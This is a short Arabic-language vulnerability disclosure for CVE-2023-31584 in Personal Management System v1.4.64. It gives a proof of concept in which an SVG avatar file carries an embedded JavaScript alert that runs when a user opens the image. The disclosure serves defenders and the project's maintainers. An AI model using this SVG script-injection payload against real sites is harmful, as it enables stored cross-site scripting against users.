
الإفصاح العام عن CVE-2023-31584.
ثغرة رفع ملفات تعسفية في نظام الإدارة الشخصية v1.4.64 تسمح للمهاجمين بتنفيذ تعليمات برمجية عشوائية عن طريق رفع ملف SVG مفبرك إلى صورة الرمز الشخصي للمستخدم.
[معلومات إضافية] 1.) قم بإنشاء ملف alert.svg بالمحتوى التالي:
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("huntr.dev");
</script>
</svg>
2.) استضف ملف .SVG على خادم ويب.
3.) ارفع ملف .SVG كصورة الرمز الشخصي. 4.) عند فتح المستخدم للصورة الرمزية في علامة تبويب منفصلة، يتم تنفيذ javascript المخزنة في ملف .SVG.
المراجع: https://github.com/Volmarg/personal-management-system